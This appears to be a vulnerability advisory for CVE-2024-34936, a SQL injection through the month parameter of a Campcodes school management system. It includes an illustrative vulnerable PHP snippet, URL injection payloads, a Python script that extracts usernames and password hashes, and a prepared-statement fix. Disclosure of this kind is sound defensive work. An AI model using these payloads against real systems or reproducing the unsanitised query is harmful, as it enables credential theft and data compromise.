CVE-2024-34936 - SQL Injection in Campcodes Complete Web-Based School Management System 1. (`/view/event1.php` via `month` Parameter)

CVE-2024-34936 is a critical SQL injection vulnerability discovered in the popular Campcodes Complete Web-Based School Management System version 1.. The flaw exists in the /view/event1.php script, where the month parameter gets passed directly to an SQL query without proper sanitization or escaping. This allows unauthenticated attackers to inject arbitrary SQL commands into the database.

If exploited, this vulnerability can lead to data theft, getting admin access, or even a complete system compromise.

The vulnerability is found in the following request

GET /view/event1.php?month=<inject_here>

Specifically, the code in event1.php looks something like this (example)

<?php
// ... some code above
$month = $_GET['month'];
$sql = "SELECT * FROM events WHERE month='$month'"; // No escaping!
$result = mysqli_query($conn, $sql);
// ... process/display events ...
?>

There is no filtering or escaping for the $month variable, making this endpoint vulnerable.

1. Classic SQL Injection PoC

To check for SQL injection, an attacker can try injecting SQL metacharacters via the month parameter. Here’s an example payload to test for error-based injection:

/view/event1.php?month=1'%20OR%201=1--%20

This payload closes the string and injects an OR condition that always evaluates to true, returning all events, regardless of the real month.

2. Dumping Usernames via UNION

Suppose the database table users exists with a username column. An attacker could use UNION to dump usernames:

/view/event1.php?month=1'+UNION+SELECT+1,username,3,4+FROM+users--+

Depending on the number of columns, the attacker may adjust the payload. If the events table has four columns, this works. The page may display usernames instead of real event data.

Here’s how you can automate exploitation with a simple Python script

import requests

url = 'http://target-site/view/event1.php';
payload = "1' UNION SELECT 1,username,password,4 FROM users-- "
params = {'month': payload}

r = requests.get(url, params=params)
print(r.text) # If vulnerable, you may see usernames and password hashes

How to Fix

- Use parameterized/prepared SQL statements.

Here’s a safe code example

<?php
$stmt = $conn->prepare("SELECT * FROM events WHERE month=?");
$stmt->bind_param("s", $_GET['month']);
$stmt->execute();
$result = $stmt->get_result();
// ... process/display events ...
?>

References

- CVE Details Entry for CVE-2024-34936
- Campcodes Complete Web-Based School Management System 1.

Conclusion

CVE-2024-34936 is a dangerous and easy-to-exploit SQL injection in a widely used PHP school management system. If you run this software update or patch immediately. If you are a developer, follow secure coding best practices to avoid simple but severe vulnerabilities.

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/07/2024 21:35:05 UTC